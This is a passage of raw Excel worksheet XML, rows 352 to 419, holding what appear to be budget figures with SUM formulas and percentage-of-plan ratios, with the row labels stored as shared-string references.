      <c r="E352" s="173"/>
      <c r="F352" s="174"/>
      <c r="G352" s="172"/>
    </row>
    <row r="353" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A353" s="128" t="s">
        <v>577</v>
      </c>
      <c r="B353" s="100"/>
      <c r="C353" s="100"/>
      <c r="D353" s="100">
        <v>0</v>
      </c>
      <c r="E353" s="173"/>
      <c r="F353" s="174"/>
      <c r="G353" s="172"/>
    </row>
    <row r="354" spans="1:7" ht="17.25" customHeight="1">
      <c r="A354" s="128" t="s">
        <v>578</v>
      </c>
      <c r="B354" s="100">
        <f>B355</f>
        <v>0</v>
      </c>
      <c r="C354" s="100">
        <f>C355</f>
        <v>0</v>
      </c>
      <c r="D354" s="100">
        <f>D355</f>
        <v>1399</v>
      </c>
      <c r="E354" s="173">
        <f>E355</f>
        <v>0</v>
      </c>
      <c r="F354" s="174"/>
      <c r="G354" s="172"/>
    </row>
    <row r="355" spans="1:7" ht="17.25" customHeight="1">
      <c r="A355" s="128" t="s">
        <v>579</v>
      </c>
      <c r="B355" s="100">
        <v>0</v>
      </c>
      <c r="C355" s="100"/>
      <c r="D355" s="100">
        <v>1399</v>
      </c>
      <c r="E355" s="173"/>
      <c r="F355" s="174"/>
      <c r="G355" s="172"/>
    </row>
    <row r="356" spans="1:7" ht="17.25" customHeight="1">
      <c r="A356" s="128" t="s">
        <v>580</v>
      </c>
      <c r="B356" s="173">
        <f>SUM(B357,B362,B371,B377,B383,B387,B391,B395,B401,B408)</f>
        <v>72674</v>
      </c>
      <c r="C356" s="173">
        <f>SUM(C357,C362,C371,C377,C383,C387,C391,C395,C401,C408)</f>
        <v>59852</v>
      </c>
      <c r="D356" s="173">
        <f>SUM(D357,D362,D371,D377,D383,D387,D391,D395,D401,D408)</f>
        <v>77817</v>
      </c>
      <c r="E356" s="173">
        <f>SUM(E357,E362,E371,E377,E383,E387,E391,E395,E401,E408)</f>
        <v>62472</v>
      </c>
      <c r="F356" s="174">
        <f aca="true" t="shared" si="23" ref="F356:F358">E356/C356*100</f>
        <v>104.3774644122168</v>
      </c>
      <c r="G356" s="172"/>
    </row>
    <row r="357" spans="1:7" ht="17.25" customHeight="1">
      <c r="A357" s="128" t="s">
        <v>581</v>
      </c>
      <c r="B357" s="100">
        <f>SUM(B358:B361)</f>
        <v>1447</v>
      </c>
      <c r="C357" s="100">
        <f>SUM(C358:C361)</f>
        <v>1447</v>
      </c>
      <c r="D357" s="100">
        <f>SUM(D358:D361)</f>
        <v>1443</v>
      </c>
      <c r="E357" s="173">
        <f>SUM(E358:E361)</f>
        <v>1443</v>
      </c>
      <c r="F357" s="174">
        <f t="shared" si="23"/>
        <v>99.72356599861783</v>
      </c>
      <c r="G357" s="172"/>
    </row>
    <row r="358" spans="1:7" ht="17.25" customHeight="1">
      <c r="A358" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B358" s="100">
        <f>2154-800</f>
        <v>1354</v>
      </c>
      <c r="C358" s="100">
        <f>2154-800</f>
        <v>1354</v>
      </c>
      <c r="D358" s="100">
        <v>1233</v>
      </c>
      <c r="E358" s="173">
        <v>1233</v>
      </c>
      <c r="F358" s="174">
        <f t="shared" si="23"/>
        <v>91.06351550960117</v>
      </c>
      <c r="G358" s="172"/>
    </row>
    <row r="359" spans="1:7" ht="17.25" customHeight="1">
      <c r="A359" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B359" s="100">
        <v>0</v>
      </c>
      <c r="C359" s="100"/>
      <c r="D359" s="100">
        <v>0</v>
      </c>
      <c r="E359" s="173"/>
      <c r="F359" s="174"/>
      <c r="G359" s="172"/>
    </row>
    <row r="360" spans="1:7" ht="17.25" customHeight="1">
      <c r="A360" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B360" s="100">
        <v>0</v>
      </c>
      <c r="C360" s="100"/>
      <c r="D360" s="100">
        <v>0</v>
      </c>
      <c r="E360" s="173"/>
      <c r="F360" s="174"/>
      <c r="G360" s="172"/>
    </row>
    <row r="361" spans="1:7" ht="17.25" customHeight="1">
      <c r="A361" s="128" t="s">
        <v>582</v>
      </c>
      <c r="B361" s="100">
        <v>93</v>
      </c>
      <c r="C361" s="100">
        <v>93</v>
      </c>
      <c r="D361" s="100">
        <v>210</v>
      </c>
      <c r="E361" s="173">
        <v>210</v>
      </c>
      <c r="F361" s="174">
        <f aca="true" t="shared" si="24" ref="F361:F366">E361/C361*100</f>
        <v>225.80645161290326</v>
      </c>
      <c r="G361" s="172"/>
    </row>
    <row r="362" spans="1:7" ht="17.25" customHeight="1">
      <c r="A362" s="128" t="s">
        <v>583</v>
      </c>
      <c r="B362" s="100">
        <f>SUM(B363:B370)</f>
        <v>26514</v>
      </c>
      <c r="C362" s="100">
        <f>SUM(C363:C370)</f>
        <v>20474</v>
      </c>
      <c r="D362" s="100">
        <f>SUM(D363:D370)</f>
        <v>22962</v>
      </c>
      <c r="E362" s="173">
        <f>SUM(E363:E370)</f>
        <v>22962</v>
      </c>
      <c r="F362" s="174">
        <f t="shared" si="24"/>
        <v>112.15199765556316</v>
      </c>
      <c r="G362" s="172"/>
    </row>
    <row r="363" spans="1:7" ht="17.25" customHeight="1">
      <c r="A363" s="128" t="s">
        <v>584</v>
      </c>
      <c r="B363" s="100">
        <v>3285</v>
      </c>
      <c r="C363" s="100">
        <v>1753</v>
      </c>
      <c r="D363" s="100">
        <v>2253</v>
      </c>
      <c r="E363" s="173">
        <v>2253</v>
      </c>
      <c r="F363" s="174">
        <f t="shared" si="24"/>
        <v>128.52253280091273</v>
      </c>
      <c r="G363" s="172"/>
    </row>
    <row r="364" spans="1:7" ht="17.25" customHeight="1">
      <c r="A364" s="128" t="s">
        <v>585</v>
      </c>
      <c r="B364" s="100">
        <v>8809</v>
      </c>
      <c r="C364" s="100">
        <v>4301</v>
      </c>
      <c r="D364" s="100">
        <v>4935</v>
      </c>
      <c r="E364" s="173">
        <v>4935</v>
      </c>
      <c r="F364" s="174">
        <f t="shared" si="24"/>
        <v>114.74075796326434</v>
      </c>
      <c r="G364" s="172"/>
    </row>
    <row r="365" spans="1:7" ht="17.25" customHeight="1">
      <c r="A365" s="128" t="s">
        <v>586</v>
      </c>
      <c r="B365" s="100">
        <v>2719</v>
      </c>
      <c r="C365" s="100">
        <v>2719</v>
      </c>
      <c r="D365" s="100">
        <v>2824</v>
      </c>
      <c r="E365" s="173">
        <v>2824</v>
      </c>
      <c r="F365" s="174">
        <f t="shared" si="24"/>
        <v>103.86171386539169</v>
      </c>
      <c r="G365" s="172"/>
    </row>
    <row r="366" spans="1:7" ht="17.25" customHeight="1">
      <c r="A366" s="128" t="s">
        <v>587</v>
      </c>
      <c r="B366" s="100">
        <v>7346</v>
      </c>
      <c r="C366" s="100">
        <v>7346</v>
      </c>
      <c r="D366" s="100">
        <v>7846</v>
      </c>
      <c r="E366" s="173">
        <v>7846</v>
      </c>
      <c r="F366" s="174">
        <f t="shared" si="24"/>
        <v>106.80642526545059</v>
      </c>
      <c r="G366" s="172"/>
    </row>
    <row r="367" spans="1:7" ht="17.25" customHeight="1">
      <c r="A367" s="128" t="s">
        <v>588</v>
      </c>
      <c r="B367" s="100">
        <v>0</v>
      </c>
      <c r="C367" s="100"/>
      <c r="D367" s="100">
        <v>0</v>
      </c>
      <c r="E367" s="173"/>
      <c r="F367" s="174"/>
      <c r="G367" s="172"/>
    </row>
    <row r="368" spans="1:7" ht="17.25" customHeight="1">
      <c r="A368" s="128" t="s">
        <v>589</v>
      </c>
      <c r="B368" s="100">
        <v>0</v>
      </c>
      <c r="C368" s="100"/>
      <c r="D368" s="100">
        <v>0</v>
      </c>
      <c r="E368" s="173"/>
      <c r="F368" s="174"/>
      <c r="G368" s="172"/>
    </row>
    <row r="369" spans="1:7" ht="17.25" customHeight="1">
      <c r="A369" s="128" t="s">
        <v>590</v>
      </c>
      <c r="B369" s="100">
        <v>0</v>
      </c>
      <c r="C369" s="100"/>
      <c r="D369" s="100">
        <v>0</v>
      </c>
      <c r="E369" s="173"/>
      <c r="F369" s="174"/>
      <c r="G369" s="172"/>
    </row>
    <row r="370" spans="1:7" ht="17.25" customHeight="1">
      <c r="A370" s="128" t="s">
        <v>591</v>
      </c>
      <c r="B370" s="100">
        <v>4355</v>
      </c>
      <c r="C370" s="100">
        <v>4355</v>
      </c>
      <c r="D370" s="100">
        <v>5104</v>
      </c>
      <c r="E370" s="173">
        <v>5104</v>
      </c>
      <c r="F370" s="174">
        <f aca="true" t="shared" si="25" ref="F370:F376">E370/C370*100</f>
        <v>117.19862227324913</v>
      </c>
      <c r="G370" s="172"/>
    </row>
    <row r="371" spans="1:7" ht="17.25" customHeight="1">
      <c r="A371" s="128" t="s">
        <v>592</v>
      </c>
      <c r="B371" s="100">
        <f>SUM(B372:B376)</f>
        <v>35922</v>
      </c>
      <c r="C371" s="100">
        <f>SUM(C372:C376)</f>
        <v>34424</v>
      </c>
      <c r="D371" s="100">
        <f>SUM(D372:D376)</f>
        <v>34568</v>
      </c>
      <c r="E371" s="173">
        <f>SUM(E372:E376)</f>
        <v>34568</v>
      </c>
      <c r="F371" s="174">
        <f t="shared" si="25"/>
        <v>100.41831280501977</v>
      </c>
      <c r="G371" s="172"/>
    </row>
    <row r="372" spans="1:7" ht="17.25" customHeight="1">
      <c r="A372" s="128" t="s">
        <v>593</v>
      </c>
      <c r="B372" s="100">
        <v>0</v>
      </c>
      <c r="C372" s="100"/>
      <c r="D372" s="100">
        <v>0</v>
      </c>
      <c r="E372" s="173"/>
      <c r="F372" s="174"/>
      <c r="G372" s="172"/>
    </row>
    <row r="373" spans="1:7" ht="17.25" customHeight="1">
      <c r="A373" s="128" t="s">
        <v>594</v>
      </c>
      <c r="B373" s="100">
        <v>7093</v>
      </c>
      <c r="C373" s="100">
        <v>6593</v>
      </c>
      <c r="D373" s="100">
        <v>6255</v>
      </c>
      <c r="E373" s="173">
        <v>6255</v>
      </c>
      <c r="F373" s="174">
        <f t="shared" si="25"/>
        <v>94.87335052328227</v>
      </c>
      <c r="G373" s="172"/>
    </row>
    <row r="374" spans="1:7" ht="17.25" customHeight="1">
      <c r="A374" s="128" t="s">
        <v>595</v>
      </c>
      <c r="B374" s="100">
        <v>715</v>
      </c>
      <c r="C374" s="100">
        <v>715</v>
      </c>
      <c r="D374" s="100">
        <v>729</v>
      </c>
      <c r="E374" s="173">
        <v>729</v>
      </c>
      <c r="F374" s="174">
        <f t="shared" si="25"/>
        <v>101.95804195804197</v>
      </c>
      <c r="G374" s="172"/>
    </row>
    <row r="375" spans="1:7" ht="17.25" customHeight="1">
      <c r="A375" s="128" t="s">
        <v>596</v>
      </c>
      <c r="B375" s="100">
        <v>23592</v>
      </c>
      <c r="C375" s="100">
        <v>22594</v>
      </c>
      <c r="D375" s="100">
        <v>23084</v>
      </c>
      <c r="E375" s="173">
        <v>23084</v>
      </c>
      <c r="F375" s="174">
        <f t="shared" si="25"/>
        <v>102.16871735859077</v>
      </c>
      <c r="G375" s="172"/>
    </row>
    <row r="376" spans="1:7" ht="17.25" customHeight="1">
      <c r="A376" s="128" t="s">
        <v>597</v>
      </c>
      <c r="B376" s="100">
        <v>4522</v>
      </c>
      <c r="C376" s="100">
        <v>4522</v>
      </c>
      <c r="D376" s="100">
        <f>3700+800</f>
        <v>4500</v>
      </c>
      <c r="E376" s="173">
        <f>3700+800</f>
        <v>4500</v>
      </c>
      <c r="F376" s="174">
        <f t="shared" si="25"/>
        <v>99.51348960636886</v>
      </c>
      <c r="G376" s="172"/>
    </row>
    <row r="377" spans="1:7" ht="17.25" customHeight="1">
      <c r="A377" s="128" t="s">
        <v>598</v>
      </c>
      <c r="B377" s="100">
        <f>SUM(B378:B382)</f>
        <v>6</v>
      </c>
      <c r="C377" s="100">
        <f>SUM(C378:C382)</f>
        <v>0</v>
      </c>
      <c r="D377" s="100">
        <f>SUM(D378:D382)</f>
        <v>0</v>
      </c>
      <c r="E377" s="173">
        <f>SUM(E378:E382)</f>
        <v>0</v>
      </c>
      <c r="F377" s="174"/>
      <c r="G377" s="172"/>
    </row>
    <row r="378" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A378" s="128" t="s">
        <v>599</v>
      </c>
      <c r="B378" s="100">
        <v>0</v>
      </c>
      <c r="C378" s="100"/>
      <c r="D378" s="100">
        <v>0</v>
      </c>
      <c r="E378" s="173"/>
      <c r="F378" s="174"/>
      <c r="G378" s="172"/>
    </row>
    <row r="379" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A379" s="128" t="s">
        <v>600</v>
      </c>
      <c r="B379" s="100">
        <v>0</v>
      </c>
      <c r="C379" s="100"/>
      <c r="D379" s="100">
        <v>0</v>
      </c>
      <c r="E379" s="173"/>
      <c r="F379" s="174"/>
      <c r="G379" s="172"/>
    </row>
    <row r="380" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A380" s="128" t="s">
        <v>601</v>
      </c>
      <c r="B380" s="100">
        <v>0</v>
      </c>
      <c r="C380" s="100"/>
      <c r="D380" s="100">
        <v>0</v>
      </c>
      <c r="E380" s="173"/>
      <c r="F380" s="174"/>
      <c r="G380" s="172"/>
    </row>
    <row r="381" spans="1:7" ht="17.25" customHeight="1">
      <c r="A381" s="128" t="s">
        <v>602</v>
      </c>
      <c r="B381" s="100">
        <v>0</v>
      </c>
      <c r="C381" s="100"/>
      <c r="D381" s="100">
        <v>0</v>
      </c>
      <c r="E381" s="173"/>
      <c r="F381" s="174"/>
      <c r="G381" s="172"/>
    </row>
    <row r="382" spans="1:7" ht="17.25" customHeight="1">
      <c r="A382" s="128" t="s">
        <v>603</v>
      </c>
      <c r="B382" s="100">
        <v>6</v>
      </c>
      <c r="C382" s="100"/>
      <c r="D382" s="100">
        <v>0</v>
      </c>
      <c r="E382" s="173"/>
      <c r="F382" s="174"/>
      <c r="G382" s="172"/>
    </row>
    <row r="383" spans="1:7" ht="17.25" customHeight="1">
      <c r="A383" s="128" t="s">
        <v>604</v>
      </c>
      <c r="B383" s="100">
        <f>SUM(B384:B386)</f>
        <v>307</v>
      </c>
      <c r="C383" s="100">
        <f>SUM(C384:C386)</f>
        <v>307</v>
      </c>
      <c r="D383" s="100">
        <f>SUM(D384:D386)</f>
        <v>278</v>
      </c>
      <c r="E383" s="173">
        <f>SUM(E384:E386)</f>
        <v>278</v>
      </c>
      <c r="F383" s="174">
        <f>E383/C383*100</f>
        <v>90.55374592833876</v>
      </c>
      <c r="G383" s="172"/>
    </row>
    <row r="384" spans="1:7" ht="17.25" customHeight="1">
      <c r="A384" s="128" t="s">
        <v>605</v>
      </c>
      <c r="B384" s="100">
        <f>707-400</f>
        <v>307</v>
      </c>
      <c r="C384" s="100">
        <f>707-400</f>
        <v>307</v>
      </c>
      <c r="D384" s="100">
        <v>278</v>
      </c>
      <c r="E384" s="173">
        <v>278</v>
      </c>
      <c r="F384" s="174">
        <f>E384/C384*100</f>
        <v>90.55374592833876</v>
      </c>
      <c r="G384" s="172"/>
    </row>
    <row r="385" spans="1:7" ht="17.25" customHeight="1">
      <c r="A385" s="128" t="s">
        <v>606</v>
      </c>
      <c r="B385" s="100">
        <v>0</v>
      </c>
      <c r="C385" s="100"/>
      <c r="D385" s="100">
        <v>0</v>
      </c>
      <c r="E385" s="173"/>
      <c r="F385" s="174"/>
      <c r="G385" s="172"/>
    </row>
    <row r="386" spans="1:7" ht="17.25" customHeight="1">
      <c r="A386" s="128" t="s">
        <v>607</v>
      </c>
      <c r="B386" s="100">
        <v>0</v>
      </c>
      <c r="C386" s="100"/>
      <c r="D386" s="100">
        <v>0</v>
      </c>
      <c r="E386" s="173"/>
      <c r="F386" s="174"/>
      <c r="G386" s="172"/>
    </row>
    <row r="387" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A387" s="128" t="s">
        <v>608</v>
      </c>
      <c r="B387" s="100">
        <f>SUM(B388:B390)</f>
        <v>0</v>
      </c>
      <c r="C387" s="100">
        <f>SUM(C388:C390)</f>
        <v>0</v>
      </c>
      <c r="D387" s="100">
        <f>SUM(D388:D390)</f>
        <v>0</v>
      </c>
      <c r="E387" s="173">
        <f>SUM(E388:E390)</f>
        <v>0</v>
      </c>
      <c r="F387" s="174"/>
      <c r="G387" s="172"/>
    </row>
    <row r="388" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A388" s="128" t="s">
        <v>609</v>
      </c>
      <c r="B388" s="100"/>
      <c r="C388" s="100"/>
      <c r="D388" s="100">
        <v>0</v>
      </c>
      <c r="E388" s="173"/>
      <c r="F388" s="174"/>
      <c r="G388" s="172"/>
    </row>
    <row r="389" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A389" s="128" t="s">
        <v>610</v>
      </c>
      <c r="B389" s="100"/>
      <c r="C389" s="100"/>
      <c r="D389" s="100">
        <v>0</v>
      </c>
      <c r="E389" s="173"/>
      <c r="F389" s="174"/>
      <c r="G389" s="172"/>
    </row>
    <row r="390" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A390" s="128" t="s">
        <v>611</v>
      </c>
      <c r="B390" s="100"/>
      <c r="C390" s="100"/>
      <c r="D390" s="100">
        <v>0</v>
      </c>
      <c r="E390" s="173"/>
      <c r="F390" s="174"/>
      <c r="G390" s="172"/>
    </row>
    <row r="391" spans="1:7" ht="17.25" customHeight="1">
      <c r="A391" s="128" t="s">
        <v>612</v>
      </c>
      <c r="B391" s="100">
        <f>SUM(B392:B394)</f>
        <v>463</v>
      </c>
      <c r="C391" s="100">
        <f>SUM(C392:C394)</f>
        <v>286</v>
      </c>
      <c r="D391" s="100">
        <f>SUM(D392:D394)</f>
        <v>301</v>
      </c>
      <c r="E391" s="173">
        <f>SUM(E392:E394)</f>
        <v>301</v>
      </c>
      <c r="F391" s="174">
        <f aca="true" t="shared" si="26" ref="F391:F395">E391/C391*100</f>
        <v>105.24475524475525</v>
      </c>
      <c r="G391" s="172"/>
    </row>
    <row r="392" spans="1:7" ht="17.25" customHeight="1">
      <c r="A392" s="128" t="s">
        <v>613</v>
      </c>
      <c r="B392" s="100">
        <v>463</v>
      </c>
      <c r="C392" s="100">
        <v>286</v>
      </c>
      <c r="D392" s="100">
        <v>301</v>
      </c>
      <c r="E392" s="173">
        <v>301</v>
      </c>
      <c r="F392" s="174">
        <f t="shared" si="26"/>
        <v>105.24475524475525</v>
      </c>
      <c r="G392" s="172"/>
    </row>
    <row r="393" spans="1:7" ht="17.25" customHeight="1">
      <c r="A393" s="128" t="s">
        <v>614</v>
      </c>
      <c r="B393" s="100">
        <v>0</v>
      </c>
      <c r="C393" s="100"/>
      <c r="D393" s="100">
        <v>0</v>
      </c>
      <c r="E393" s="173"/>
      <c r="F393" s="174"/>
      <c r="G393" s="172"/>
    </row>
    <row r="394" spans="1:7" ht="17.25" customHeight="1">
      <c r="A394" s="128" t="s">
        <v>615</v>
      </c>
      <c r="B394" s="100">
        <v>0</v>
      </c>
      <c r="C394" s="100"/>
      <c r="D394" s="100">
        <v>0</v>
      </c>
      <c r="E394" s="173"/>
      <c r="F394" s="174"/>
      <c r="G394" s="172"/>
    </row>
    <row r="395" spans="1:7" ht="17.25" customHeight="1">
      <c r="A395" s="128" t="s">
        <v>616</v>
      </c>
      <c r="B395" s="100">
        <f>SUM(B396:B400)</f>
        <v>2914</v>
      </c>
      <c r="C395" s="100">
        <f>SUM(C396:C400)</f>
        <v>2914</v>
      </c>
      <c r="D395" s="100">
        <f>SUM(D396:D400)</f>
        <v>2920</v>
      </c>
      <c r="E395" s="173">
        <f>SUM(E396:E400)</f>
        <v>2920</v>
      </c>
      <c r="F395" s="174">
        <f t="shared" si="26"/>
        <v>100.20590253946466</v>
      </c>
      <c r="G395" s="172"/>
    </row>
    <row r="396" spans="1:7" ht="17.25" customHeight="1">
      <c r="A396" s="128" t="s">
        <v>617</v>
      </c>
      <c r="B396" s="100">
        <v>0</v>
      </c>
      <c r="C396" s="100"/>
      <c r="D396" s="100">
        <v>0</v>
      </c>
      <c r="E396" s="173"/>
      <c r="F396" s="174"/>
      <c r="G396" s="172"/>
    </row>
    <row r="397" spans="1:7" ht="17.25" customHeight="1">
      <c r="A397" s="128" t="s">
        <v>618</v>
      </c>
      <c r="B397" s="100">
        <v>1314</v>
      </c>
      <c r="C397" s="100">
        <v>1314</v>
      </c>
      <c r="D397" s="100">
        <v>1220</v>
      </c>
      <c r="E397" s="173">
        <v>1220</v>
      </c>
      <c r="F397" s="174">
        <f aca="true" t="shared" si="27" ref="F397:F400">E397/C397*100</f>
        <v>92.8462709284627</v>
      </c>
      <c r="G397" s="172"/>
    </row>
    <row r="398" spans="1:7" ht="17.25" customHeight="1">
      <c r="A398" s="128" t="s">
        <v>619</v>
      </c>
      <c r="B398" s="100">
        <v>100</v>
      </c>
      <c r="C398" s="100">
        <v>100</v>
      </c>
      <c r="D398" s="100">
        <v>200</v>
      </c>
      <c r="E398" s="173">
        <v>200</v>
      </c>
      <c r="F398" s="174">
        <f t="shared" si="27"/>
        <v>200</v>
      </c>
      <c r="G398" s="172"/>
    </row>
    <row r="399" spans="1:7" ht="17.25" customHeight="1">
      <c r="A399" s="128" t="s">
        <v>620</v>
      </c>
      <c r="B399" s="100">
        <v>0</v>
      </c>
      <c r="C399" s="100"/>
      <c r="D399" s="100">
        <v>0</v>
      </c>
      <c r="E399" s="173"/>
      <c r="F399" s="174"/>
      <c r="G399" s="172"/>
    </row>
    <row r="400" spans="1:7" ht="17.25" customHeight="1">
      <c r="A400" s="128" t="s">
        <v>621</v>
      </c>
      <c r="B400" s="100">
        <v>1500</v>
      </c>
      <c r="C400" s="100">
        <v>1500</v>
      </c>
      <c r="D400" s="100">
        <v>1500</v>
      </c>
      <c r="E400" s="173">
        <v>1500</v>
      </c>
      <c r="F400" s="174">
        <f t="shared" si="27"/>
        <v>100</v>
      </c>
      <c r="G400" s="172"/>
    </row>
    <row r="401" spans="1:7" ht="17.25" customHeight="1">
      <c r="A401" s="128" t="s">
        <v>622</v>
      </c>
      <c r="B401" s="100">
        <f>SUM(B402:B407)</f>
        <v>5101</v>
      </c>
      <c r="C401" s="100">
        <f>SUM(C402:C407)</f>
        <v>0</v>
      </c>
      <c r="D401" s="100">
        <f>SUM(D402:D407)</f>
        <v>0</v>
      </c>
      <c r="E401" s="173">
        <f>SUM(E402:E407)</f>
        <v>0</v>
      </c>
      <c r="F401" s="174"/>
      <c r="G401" s="172"/>
    </row>
    <row r="402" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A402" s="128" t="s">
        <v>623</v>
      </c>
      <c r="B402" s="100">
        <v>0</v>
      </c>
      <c r="C402" s="100"/>
      <c r="D402" s="100">
        <v>0</v>
      </c>
      <c r="E402" s="173"/>
      <c r="F402" s="174"/>
      <c r="G402" s="172"/>
    </row>
    <row r="403" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A403" s="128" t="s">
        <v>624</v>
      </c>
      <c r="B403" s="100">
        <v>0</v>
      </c>
      <c r="C403" s="100"/>
      <c r="D403" s="100">
        <v>0</v>
      </c>
      <c r="E403" s="173"/>
      <c r="F403" s="174"/>
      <c r="G403" s="172"/>
    </row>
    <row r="404" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A404" s="128" t="s">
        <v>625</v>
      </c>
      <c r="B404" s="100">
        <v>0</v>
      </c>
      <c r="C404" s="100"/>
      <c r="D404" s="100">
        <v>0</v>
      </c>
      <c r="E404" s="173"/>
      <c r="F404" s="174"/>
      <c r="G404" s="172"/>
    </row>
    <row r="405" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A405" s="128" t="s">
        <v>626</v>
      </c>
      <c r="B405" s="100">
        <v>0</v>
      </c>
      <c r="C405" s="100"/>
      <c r="D405" s="100">
        <v>0</v>
      </c>
      <c r="E405" s="173"/>
      <c r="F405" s="174"/>
      <c r="G405" s="172"/>
    </row>
    <row r="406" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A406" s="128" t="s">
        <v>627</v>
      </c>
      <c r="B406" s="100">
        <v>0</v>
      </c>
      <c r="C406" s="100"/>
      <c r="D406" s="100">
        <v>0</v>
      </c>
      <c r="E406" s="173"/>
      <c r="F406" s="174"/>
      <c r="G406" s="172"/>
    </row>
    <row r="407" spans="1:7" ht="17.25" customHeight="1">
      <c r="A407" s="128" t="s">
        <v>628</v>
      </c>
      <c r="B407" s="100">
        <v>5101</v>
      </c>
      <c r="C407" s="100"/>
      <c r="D407" s="100">
        <v>0</v>
      </c>
      <c r="E407" s="173"/>
      <c r="F407" s="174"/>
      <c r="G407" s="172"/>
    </row>
    <row r="408" spans="1:7" ht="17.25" customHeight="1">
      <c r="A408" s="128" t="s">
        <v>629</v>
      </c>
      <c r="B408" s="100"/>
      <c r="C408" s="100"/>
      <c r="D408" s="100">
        <f>15345</f>
        <v>15345</v>
      </c>
      <c r="E408" s="173"/>
      <c r="F408" s="174"/>
      <c r="G408" s="172"/>
    </row>
    <row r="409" spans="1:7" ht="17.25" customHeight="1">
      <c r="A409" s="128" t="s">
        <v>630</v>
      </c>
      <c r="B409" s="100">
        <f>SUM(B410,B415,B423,B429,B433,B438,B443,B450,B454,B458)</f>
        <v>2872</v>
      </c>
      <c r="C409" s="100">
        <f>SUM(C410,C415,C423,C429,C433,C438,C443,C450,C454,C458)</f>
        <v>2872</v>
      </c>
      <c r="D409" s="100">
        <f>SUM(D410,D415,D423,D429,D433,D438,D443,D450,D454,D458)</f>
        <v>5698</v>
      </c>
      <c r="E409" s="173">
        <f>SUM(E410,E415,E423,E429,E433,E438,E443,E450,E454,E458)</f>
        <v>5604</v>
      </c>
      <c r="F409" s="174">
        <f aca="true" t="shared" si="28" ref="F409:F411">E409/C409*100</f>
        <v>195.12534818941504</v>
      </c>
      <c r="G409" s="172"/>
    </row>
    <row r="410" spans="1:7" ht="17.25" customHeight="1">
      <c r="A410" s="128" t="s">
        <v>631</v>
      </c>
      <c r="B410" s="100">
        <f>SUM(B411:B414)</f>
        <v>279</v>
      </c>
      <c r="C410" s="100">
        <f>SUM(C411:C414)</f>
        <v>279</v>
      </c>
      <c r="D410" s="100">
        <f>SUM(D411:D414)</f>
        <v>234</v>
      </c>
      <c r="E410" s="173">
        <f>SUM(E411:E414)</f>
        <v>234</v>
      </c>
      <c r="F410" s="174">
        <f t="shared" si="28"/>
        <v>83.87096774193549</v>
      </c>
      <c r="G410" s="172"/>
    </row>
    <row r="411" spans="1:7" ht="17.25" customHeight="1">
      <c r="A411" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B411" s="100">
        <v>279</v>
      </c>
      <c r="C411" s="100">
        <v>279</v>
      </c>
      <c r="D411" s="100">
        <v>234</v>
      </c>
      <c r="E411" s="173">
        <v>234</v>
      </c>
      <c r="F411" s="174">
        <f t="shared" si="28"/>
        <v>83.87096774193549</v>
      </c>
      <c r="G411" s="172"/>
    </row>
    <row r="412" spans="1:7" ht="17.25" customHeight="1">
      <c r="A412" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B412" s="100">
        <v>0</v>
      </c>
      <c r="C412" s="100"/>
      <c r="D412" s="100">
        <v>0</v>
      </c>
      <c r="E412" s="173"/>
      <c r="F412" s="174"/>
      <c r="G412" s="172"/>
    </row>
    <row r="413" spans="1:7" ht="17.25" customHeight="1">
      <c r="A413" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B413" s="100">
        <v>0</v>
      </c>
      <c r="C413" s="100"/>
      <c r="D413" s="100">
        <v>0</v>
      </c>
      <c r="E413" s="173"/>
      <c r="F413" s="174"/>
      <c r="G413" s="172"/>
    </row>
    <row r="414" spans="1:7" ht="17.25" customHeight="1">
      <c r="A414" s="128" t="s">
        <v>632</v>
      </c>
      <c r="B414" s="100">
        <v>0</v>
      </c>
      <c r="C414" s="100"/>
      <c r="D414" s="100">
        <v>0</v>
      </c>
      <c r="E414" s="173"/>
      <c r="F414" s="174"/>
      <c r="G414" s="172"/>
    </row>
    <row r="415" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A415" s="128" t="s">
        <v>633</v>
      </c>
      <c r="B415" s="100">
        <f>SUM(B416:B422)</f>
        <v>0</v>
      </c>
      <c r="C415" s="100">
        <f>SUM(C416:C422)</f>
        <v>0</v>
      </c>
      <c r="D415" s="100">
        <f>SUM(D416:D422)</f>
        <v>0</v>
      </c>
      <c r="E415" s="173">
        <f>SUM(E416:E422)</f>
        <v>0</v>
      </c>
      <c r="F415" s="174"/>
      <c r="G415" s="172"/>
    </row>
    <row r="416" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A416" s="128" t="s">
        <v>634</v>
      </c>
      <c r="B416" s="100"/>
      <c r="C416" s="100"/>
      <c r="D416" s="100">
        <v>0</v>
      </c>
      <c r="E416" s="173"/>
      <c r="F416" s="174"/>
      <c r="G416" s="172"/>
    </row>
    <row r="417" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A417" s="128" t="s">
        <v>635</v>
      </c>
      <c r="B417" s="100"/>
      <c r="C417" s="100"/>
      <c r="D417" s="100">
        <v>0</v>
      </c>
      <c r="E417" s="173"/>
      <c r="F417" s="174"/>
      <c r="G417" s="172"/>
    </row>
    <row r="418" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A418" s="128" t="s">
        <v>636</v>
      </c>
      <c r="B418" s="100"/>
      <c r="C418" s="100"/>
      <c r="D418" s="100">
        <v>0</v>
      </c>
      <c r="E418" s="173"/>
      <c r="F418" s="174"/>
      <c r="G418" s="172"/>
    </row>
    <row r="419" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A419" s="128" t="s">
        <v>637</v>
      </c>
      <c r="B419" s="100"/>
